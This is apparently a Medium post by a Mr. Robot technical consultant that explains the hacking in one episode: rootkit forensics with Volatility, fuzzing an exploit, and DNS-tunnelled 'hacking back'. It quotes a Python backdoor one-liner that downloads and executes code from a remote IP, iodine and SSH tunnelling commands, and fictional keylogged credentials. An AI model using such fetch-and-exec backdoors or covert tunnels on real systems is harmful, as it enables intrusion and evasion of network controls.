Mr. Robot Disassembled: eps3.8_stage3.torrent

Hunting for a rootkit

Elliot uses Volatility to hunt for evidence of a rootkit in memory
vol.py -f out.mem --profile=kali linux_find_file -i 0xffff880028c740c0 -O ld.so.preload
Output of the Volatility process listing plugin, “linux_psaux”, revealing a Python-based backdoor
python -c import urllib;exec urllib.urlopen("http://192.251.68.228/index").read()

Crafting an exploit

Tools of the trade for vulnerability research: afl-fuzz and gdb
Original mock-up for afl-fuzz screens
Segmentation fault in evince after loading one of the malformed inputs generated by afl-fuzz
Original mock-up — Elliot doing some additional crash analysis with gdb-peda
Shellcode in Elliot’s PDF exploit for “evince”

Hacking back (with tunnels in tunnels)

A Dark Army operator takes the bait and opens Elliot’s PDF
Elliot connects to the Dark Army operator’s infected system
root@kali:~# iodined -f 172.17.0.1 u1rbr0uz.net
Enter password:
Opened dns0
Setting IP of dns0 to 172.17.0.1
Setting MTU of dns0 to 1130
Opened IPv4 UDP socket
Listening to dns for domain test.com
root@kali:~# ssh garyhost@172.17.0.2 -q -C -D 22381
Welcome to Ubuntu Kylin 14.04.3 LTS (GNU/Linux 3.19.0–25-generic i686)
Elliot searches through the keylogger output file. Fans of the ARG might want to try connecting to that IP…
192.251.68.236[ENTR]
garyhost[ENTR]
huntr[BS]er3[BS]2[ENTR]
Original mock-up of the Dark Army’s master control panel.
Web-based control panel for the “Beta Bot” botnet

--

--

--

CISO @ Wiz.io, and tech consultant for @whoismrrobot S2 & S3.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Disconnect: Invisible Trackers Blocked

Refer a Friend and Earn DODO Tokens: Introducing the DODO Referral Program

NFTsnapback Airdrop Date Confirmed.

DeFine Anniversary Badges Claiming Starts

{UPDATE} doodle mix Hack Free Resources Generator

With Assure your security is guaranteed

The 5 Reasons I’m Joining BIGtoken As CEO

How Does DNS Work?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ryan Kazanciyan

Ryan Kazanciyan

CISO @ Wiz.io, and tech consultant for @whoismrrobot S2 & S3.

More from Medium

picoCTF: Wireshark doo dooo do doo…

Let me tell you about SSH..

TryHackMe: Gallery

[EN] TryHackMe 25 Days of Cyber Security: Day 13 Walkthrough